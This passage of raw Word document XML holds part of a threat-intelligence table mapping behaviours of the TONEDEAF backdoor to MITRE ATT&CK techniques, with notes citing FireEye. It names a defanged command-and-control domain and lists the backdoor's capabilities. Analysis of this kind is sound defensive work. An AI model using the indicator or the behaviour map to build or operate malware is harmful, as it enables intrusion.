          </w:tcPr>
          <w:p w14:paraId="6F41CFD4" w14:textId="2F8A83B7" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="00BC49FB" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1053.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ACEF260" w14:textId="2280D5D6" w:rsidR="007B58F4" w:rsidRDefault="00BC49FB" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0035182F" w14:textId="77777777" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="007B58F4" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FED653F" w14:textId="623D69B9" w:rsidR="007B58F4" w:rsidRDefault="008D7F76" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2151CEC6" w14:textId="55B4E77D" w:rsidR="007B58F4" w:rsidRDefault="00BC49FB" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE/IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A763C34" w14:textId="23099543" w:rsidR="007B58F4" w:rsidRDefault="00BC49FB" w:rsidP="002F6F9E">
            <w:r>
              <w:t>[1] See above</w:t>
            </w:r>
            <w:r w:rsidRPr="00F125AD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F125AD" w:rsidRPr="00B857D7" w14:paraId="3F9F3DAC" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78A15B1C" w14:textId="41003880" w:rsidR="00F125AD" w:rsidRDefault="008D7F76" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61314917" w14:textId="2D450732" w:rsidR="00F125AD" w:rsidRPr="00B857D7" w:rsidRDefault="008D7F76" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ACDE460" w14:textId="5B1865C7" w:rsidR="00F125AD" w:rsidRPr="00B857D7" w:rsidRDefault="008D7F76" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07BF1BBB" w14:textId="4C31E5B3" w:rsidR="00F125AD" w:rsidRDefault="008D7F76" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49979B24" w14:textId="77777777" w:rsidR="00F125AD" w:rsidRPr="00B857D7" w:rsidRDefault="00F125AD" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5827957C" w14:textId="690DB9EB" w:rsidR="00F125AD" w:rsidRDefault="008D7F76" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="019E94FC" w14:textId="46F68547" w:rsidR="00F125AD" w:rsidRDefault="008D7F76" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FBD4776" w14:textId="77777777" w:rsidR="00F125AD" w:rsidRDefault="008D7F76" w:rsidP="002F6F9E">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="008D7F76">
              <w:t xml:space="preserve">Upon first execution of TONEDEAF, FireEye identified a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:t>callback</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:t xml:space="preserve"> to the C2 server </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:t>offlineearthquake</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:t>[.]com over port 80.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC64058" w14:textId="10ED38C9" w:rsidR="000A6B06" w:rsidRDefault="000A6B06" w:rsidP="002F6F9E">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00575342">
              <w:t xml:space="preserve">TONEDEAF is a backdoor that communicates with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00575342">
              <w:t>Command and Control</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00575342">
              <w:t xml:space="preserve"> servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w14:paraId="011C320E" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D17EC4" w14:textId="1E7633E5" w:rsidR="00EE29C0" w:rsidRDefault="00EE29C0" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AF90CD4" w14:textId="64CC48BA" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00EE29C0" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6E02DF" w14:textId="77777777" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00EE29C0" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1053.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A710764" w14:textId="34293F9F" w:rsidR="00EE29C0" w:rsidRDefault="00EE29C0" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D35741F" w14:textId="77777777" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00EE29C0" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36B4BF93" w14:textId="77777777" w:rsidR="00EE29C0" w:rsidRDefault="00EE29C0" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F263D0C" w14:textId="1DF9E706" w:rsidR="00EE29C0" w:rsidRDefault="00EE29C0" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0900DC9D" w14:textId="5C559EB1" w:rsidR="00EE29C0" w:rsidRDefault="00EE29C0" w:rsidP="00D26036">
            <w:r>
              <w:t>[1] Regular execution of malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F23177" w:rsidRPr="00B857D7" w14:paraId="1644354C" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ABC267A" w14:textId="1779E4F2" w:rsidR="00F23177" w:rsidRDefault="00EB06B5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F1CC5BF" w14:textId="7110B4E1" w:rsidR="00F23177" w:rsidRPr="00B857D7" w:rsidRDefault="001A2999" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DDB2FC4" w14:textId="27181255" w:rsidR="00F23177" w:rsidRPr="00B857D7" w:rsidRDefault="001A2999" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1082 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CC443F4" w14:textId="54F8796D" w:rsidR="00F23177" w:rsidRDefault="00EB06B5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="306FA1A3" w14:textId="77777777" w:rsidR="00F23177" w:rsidRPr="00B857D7" w:rsidRDefault="00F23177" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4598B452" w14:textId="79D24E47" w:rsidR="00F23177" w:rsidRDefault="001A2999" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E4A79EB" w14:textId="78AD0906" w:rsidR="00F23177" w:rsidRDefault="00490881" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A33F4D3" w14:textId="316703E2" w:rsidR="00F23177" w:rsidRDefault="001A2999" w:rsidP="002F6F9E">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="001A2999">
              <w:t>Additionally, during installation, the malware retrieves the system and current user names, which are used to create a three-character “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001A2999">
              <w:t>sys_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001A2999">
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w14:paraId="504F3DE9" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="332F87AA" w14:textId="3C6AC857" w:rsidR="001A2999" w:rsidRDefault="001A2999" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00EB06B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4174493E" w14:textId="77777777" w:rsidR="001A2999" w:rsidRPr="00B857D7" w:rsidRDefault="001A2999" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001A2999">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="252AAA1D" w14:textId="4D3F370D" w:rsidR="001A2999" w:rsidRPr="00B857D7" w:rsidRDefault="00490881" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490881">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00490881">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1033 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00490881">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
